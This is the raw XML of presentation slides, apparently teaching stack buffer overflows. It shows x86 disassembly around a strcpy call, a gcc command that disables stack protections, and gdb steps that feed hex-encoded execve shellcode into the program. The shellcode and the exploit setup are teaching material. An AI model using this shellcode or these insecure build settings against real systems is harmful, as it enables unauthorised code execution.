              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx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mr-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,0x4(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">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mr-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>lea</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-0x32(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>),</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx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mr-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>esp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">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call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>80482d0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy@plt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$0xa,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="mr-IN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx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leave</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="322202" y="5326464"/>
            <a:ext cx="7662440" cy="1077218"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -Wall -Wall -O0 -g -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-omit-frame-pointer -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Wno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-deprecated-declarations -D_FORTIFY_SOURCE=0 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-pie -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Wno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-format -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Wno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-format-security -z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>norelro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>execstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-stack-protector -m32 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mpreferred</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-stack-boundary=2</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="39549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marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -Wall -Wall -O0 -g -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-omit-frame-pointer -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Wno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-deprecated-declarations -D_FORTIFY_SOURCE=0 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-pie -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Wno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-format -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>Wno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-format-security -z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>norelro</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -z </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>execstack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-stack-protector -m32 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mpreferred</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>-stack-boundary=2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>a.out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="nl-NL" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>b *0x80483fd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>) r `python -c "print '\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x50\x53\x86\xe5\x89\xc2\x0b\x01\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\x80\x31\xc0\xb0\x01\x31\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>xcd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>\x80'"`</a:t>
            </a:r>
          </a:p>
          <a:p>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207</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13360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624660202"/>
              </p:ext>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dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xbffff734</a:t>
                      </a:r>
                    </a:p>
